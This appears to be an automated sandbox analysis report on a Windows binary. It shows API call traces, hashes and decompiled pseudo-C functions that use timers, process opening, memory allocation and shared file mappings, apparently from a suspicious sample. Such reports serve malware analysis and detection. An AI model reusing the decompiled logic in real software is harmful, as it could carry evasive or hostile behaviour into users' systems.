                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00FC5B38
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B55
                                                                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,00FC92CC,?,038F9630), ref: 00FC6F83
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2829: lstrlen.KERNEL32(038F887A,00000000,00000000,00000000,00FC6328,00000000), ref: 00FC2839
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2829: lstrlen.KERNEL32(?), ref: 00FC2841
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2829: lstrcpy.KERNEL32(00000000,038F887A), ref: 00FC2855
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2829: lstrcat.KERNEL32(00000000,?), ref: 00FC2860
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00FC6FA3
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 00FC6FB5
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FC6FBB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC33FA: lstrlen.KERNEL32(?,00FCA380,73BB7FC0,00000000,00FC2788,?,?,?,?,?,00FC3EAC,?), ref: 00FC3403
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC33FA: mbstowcs.NTDLL ref: 00FC342A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC33FA: memset.NTDLL ref: 00FC343C
                                                                                                                                                                                                                                                                                    • wcstombs.NTDLL ref: 00FC704E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1671: SysAllocString.OLEAUT32(00000000), ref: 00FC16B2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FC1734
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FC1773
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F
                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 00FC708F
                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00FC709F
                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,038F9630), ref: 00FC70AF
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00FC70BF
                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?), ref: 00FC70CD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                                                                    • String ID: va\x
                                                                                                                                                                                                                                                                                    • API String ID: 2871901346-1859480093
                                                                                                                                                                                                                                                                                    • Opcode ID: 9849722b6869381b03c27c9ec9a8743237c1d95ff5921b9462db394b0f5c811d
                                                                                                                                                                                                                                                                                    • Instruction ID: a38bbc9e20749c802db53783a4ec3098c9fea399df1352266b14cdd36202c059
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9849722b6869381b03c27c9ec9a8743237c1d95ff5921b9462db394b0f5c811d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9A17C7190021EAFCB11DF68DE8AE9A3BA8FF49354F144069F809C7261D735E950EFA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstChangeNotificationW.KERNELBASE(6E097670,00000001,00000040), ref: 6E064885
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F01), ref: 6E0648E8
                                                                                                                                                                                                                                                                                    • FindFirstChangeNotificationW.KERNELBASE(6E09767C,00000001,00000008), ref: 6E064A56
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182584056.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ChangeFindFirstNotification$IconLoad
                                                                                                                                                                                                                                                                                    • String ID: n$8n$8n$8n$Hn$Xn$Xn
                                                                                                                                                                                                                                                                                    • API String ID: 2944710551-1746711009
                                                                                                                                                                                                                                                                                    • Opcode ID: 47c1395ab908abb1d965f465569faf22cfb828acc0288b8712116717433e17bc
                                                                                                                                                                                                                                                                                    • Instruction ID: acc7cb7fa391fc89751ac312106f52c5dffe102a73241e06447973bcf2392f78
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47c1395ab908abb1d965f465569faf22cfb828acc0288b8712116717433e17bc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C12AD71A08A11EFDF44CF68C9AC3693BE1F786715F05A62EE48487385D7349C478B92
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                    			E00FC1B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				struct %anon52 _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                                                                    				void _v88;
                                                                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                                                                    				struct %anon52 _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                                                                    				long _t53;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				struct %anon52 _t61;
                                                                                                                                                                                                                                                                                    				long _t65;
                                                                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                                                                                                    				void** _t78;
                                                                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t74 = __edx;
                                                                                                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                                                                                                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                                                                    				_v44 = _t46;
                                                                                                                                                                                                                                                                                    				if(_t46 == 0) {
                                                                                                                                                                                                                                                                                    					_v8.LowPart = GetLastError();
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_push(0xffffffff);
                                                                                                                                                                                                                                                                                    					_push(0xff676980);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push( *0xfca298);
                                                                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					L00FC7F56();
                                                                                                                                                                                                                                                                                    					_v36.LowPart = _t46;
                                                                                                                                                                                                                                                                                    					_v32 = _t74;
                                                                                                                                                                                                                                                                                    					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					_t51 =  *0xfca2c4; // 0x228
                                                                                                                                                                                                                                                                                    					_v40 = _t51;
                                                                                                                                                                                                                                                                                    					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                                                                    					_v8.LowPart = _t53;
                                                                                                                                                                                                                                                                                    					if(_t53 == 0) {
                                                                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                                                                    							 *0xfca2a4 = 5;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t69 = E00FC4A3C(_t74); // executed
                                                                                                                                                                                                                                                                                    							if(_t69 != 0) {
                                                                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						if(_v12 == 1 && ( *0xfca2b8 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t72 = _v12;
                                                                                                                                                                                                                                                                                    						_t58 = _t72 << 4;
                                                                                                                                                                                                                                                                                    						_t76 = _t80 + (_t72 << 4) - 0x54;
                                                                                                                                                                                                                                                                                    						_t73 = _t72 + 1;
                                                                                                                                                                                                                                                                                    						_v24 = _t72 + 1;
                                                                                                                                                                                                                                                                                    						_t61 = E00FC243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
                                                                                                                                                                                                                                                                                    						_v8.LowPart = _t61;
                                                                                                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t66 = _v24;
                                                                                                                                                                                                                                                                                    						_t90 = _t66 - 3;
                                                                                                                                                                                                                                                                                    						_v12 = _t66;
                                                                                                                                                                                                                                                                                    						if(_t66 != 3) {
                                                                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v8.LowPart = E00FC7289(_t73, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                                                                    						__eflags = _t61 - 0x10d2;
                                                                                                                                                                                                                                                                                    						if(_t61 != 0x10d2) {
                                                                                                                                                                                                                                                                                    							_push(0xffffffff);
                                                                                                                                                                                                                                                                                    							_push(0xff676980);
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push( *0xfca29c);
                                                                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							__eflags =  *0xfca2a0; // 0xa
                                                                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t61 = E00FC2813();
                                                                                                                                                                                                                                                                                    								_push(0xffffffff);
                                                                                                                                                                                                                                                                                    								_push(0xdc3cba00);
                                                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                                                    								_push( *0xfca2a0);
                                                                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                                                                    								L00FC7F56();
                                                                                                                                                                                                                                                                                    								_v36.LowPart = _t61;
                                                                                                                                                                                                                                                                                    								_v32 = _t76;
                                                                                                                                                                                                                                                                                    								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                                                                    								__eflags = _t65;
                                                                                                                                                                                                                                                                                    								_v8.LowPart = _t65;
                                                                                                                                                                                                                                                                                    								if(_t65 == 0) {
                                                                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					_t78 =  &_v92;
                                                                                                                                                                                                                                                                                    					_t71 = 3;
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						_t54 =  *_t78;
                                                                                                                                                                                                                                                                                    						if(_t54 != 0) {
                                                                                                                                                                                                                                                                                    							HeapFree( *0xfca290, 0, _t54);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t78 =  &(_t78[4]);
                                                                                                                                                                                                                                                                                    						_t71 = _t71 - 1;
                                                                                                                                                                                                                                                                                    					} while (_t71 != 0);
                                                                                                                                                                                                                                                                                    					CloseHandle(_v44);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    0x00fc1c5d
                                                                                                                                                                                                                                                                                    0x00fc1c60
                                                                                                                                                                                                                                                                                    0x00fc1c60
                                                                                                                                                                                                                                                                                    0x00fc1c66
                                                                                                                                                                                                                                                                                    0x00fc1c66
                                                                                                                                                                                                                                                                                    0x00fc1ce3
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00FC1B5C
                                                                                                                                                                                                                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00FC1B68
                                                                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00FC1B8D
                                                                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00FC1BA9
                                                                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FC1BC2
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 00FC1C57
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FC1C66
                                                                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00FC1CA0
                                                                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00FC2F7D), ref: 00FC1CB6
                                                                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FC1CC1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC4A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,038F9338,00000000,?,73BCF710,00000000,73BCF730), ref: 00FC4A8B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC4A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,038F9370,?,00000000,30314549,00000014,004F0053,038F932C), ref: 00FC4B28
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC4A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FC1BD5), ref: 00FC4B3A
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00FC1CD3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3521023985-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f1388545cd1f88955bdae120e256341d132a6d1f022a6b65e7609e655a6148f1
                                                                                                                                                                                                                                                                                    • Instruction ID: 3cdf8f2e6b73d8d585caefb5f4fe81c803184d7e9be1f6d6c48c1fba5a55a49e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1388545cd1f88955bdae120e256341d132a6d1f022a6b65e7609e655a6148f1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27518971C0522EAACF10DF94DE46EEEBBB8FF46364F20411AF410A2191D7759A50EBA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                    			E6E0517A7(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v44;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				long _v52;
                                                                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                                                                    				long _t27;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t21 = E6E05146C();
                                                                                                                                                                                                                                                                                    				_v52 = _t21;
                                                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                                                    					return _t21;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					GetSystemTime( &_v44);
                                                                                                                                                                                                                                                                                    					_t23 = SwitchToThread();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t45 = 9;
                                                                                                                                                                                                                                                                                    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                                                                                                                    					_t26 = E6E0515A3(0, _t54); // executed
                                                                                                                                                                                                                                                                                    					_v56 = _t26;
                                                                                                                                                                                                                                                                                    					Sleep(_t54 << 5); // executed
                                                                                                                                                                                                                                                                                    					_t21 = _v56;
                                                                                                                                                                                                                                                                                    				} while (_t21 == 0xc);
                                                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t27 = E6E051C12(_t45); // executed
                                                                                                                                                                                                                                                                                    				_v52 = _t27;
                                                                                                                                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                                                                                    					_t21 = _v52;
                                                                                                                                                                                                                                                                                    					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6E051CA4(E6E0516EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6E051D7C(_t45,  &_v48) != 0) {
					 *0x6e0541b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6e0541b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6E051C8F(_t50 + _t15);
				 *0x6e0541b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6E05136A(_t44);
					goto L11;
				}
			}

APIs
  • Part of subcall function 6E05146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0517B8,73B763F0,00000000), ref: 6E05147B
  • Part of subcall function 6E05146C: GetVersion.KERNEL32 ref: 6E05148A
  • Part of subcall function 6E05146C: GetCurrentProcessId.KERNEL32 ref: 6E051499
  • Part of subcall function 6E05146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0514B2
• GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6E0517CB
• SwitchToThread.KERNEL32 ref: 6E0517D1
  • Part of subcall function 6E0515A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E0515F9
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0515A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E0517EC), ref: 6E05168B
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E0515A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E0516A6
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 6E0517F4
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNELBASE ref: 6E05183C
                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNELBASE ref: 6E05185A
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E0516EC,?,00000000), ref: 6E05188C
                                                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E0518A0
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E0518A7
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(6E0516EC,?,00000000), ref: 6E0518AF
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E0518C2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ed95a290e3b3bcbf8c20b65269417d1dcb0e9b200fc8e0e7476b44c03d647003
                                                                                                                                                                                                                                                                                    • Instruction ID: 73df094d14b09fda9497128790b28c4241294c38b37dfd2d5e6384718fc149a8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed95a290e3b3bcbf8c20b65269417d1dcb0e9b200fc8e0e7476b44c03d647003
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88316471804F11ABD760DFE58A48BAF77ECEF8A754B100E1AF465C2344E734C918CAA2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                                                                    			E00FC57AD(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				struct _FILETIME* _v12;
                                                                                                                                                                                                                                                                                    				short _v56;
                                                                                                                                                                                                                                                                                    				struct _FILETIME* _t12;
                                                                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t27 = __edx;
                                                                                                                                                                                                                                                                                    				_t12 =  &_v12;
                                                                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                                                                    				_push(_v8);
                                                                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                                                                    				L00FC7F50();
                                                                                                                                                                                                                                                                                    				_push(_t12);
                                                                                                                                                                                                                                                                                    				_v12 = _t12;
                                                                                                                                                                                                                                                                                    				_t13 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    				_t5 = _t13 + 0xfcb84d; // 0x38f8df5
                                                                                                                                                                                                                                                                                    				_t6 = _t13 + 0xfcb580; // 0x530025
                                                                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                                                                    				_push( &_v56);
                                                                                                                                                                                                                                                                                    				_v8 = _t27;
                                                                                                                                                                                                                                                                                    				L00FC7C2A();
                                                                                                                                                                                                                                                                                    				_t17 = CreateFileMappingW(0xffffffff, 0xfca2d4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                                                                    				_t30 = _t17;
                                                                                                                                                                                                                                                                                    				if(_t30 == 0) {
                                                                                                                                                                                                                                                                                    					_t28 = GetLastError();
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                                                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                                                                                                    							_t28 = GetLastError();
                                                                                                                                                                                                                                                                                    							if(_t28 != 0) {
                                                                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *_a4 = _t30;
                                                                                                                                                                                                                                                                                    							 *_a8 = _t21;
                                                                                                                                                                                                                                                                                    							_t28 = 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t28 = 2;
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						CloseHandle(_t30);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t28;
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x00fc5839
                                                                                                                                                                                                                                                                                    0x00fc5841
                                                                                                                                                                                                                                                                                    0x00fc5853
                                                                                                                                                                                                                                                                                    0x00fc5857
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc5843
                                                                                                                                                                                                                                                                                    0x00fc5846
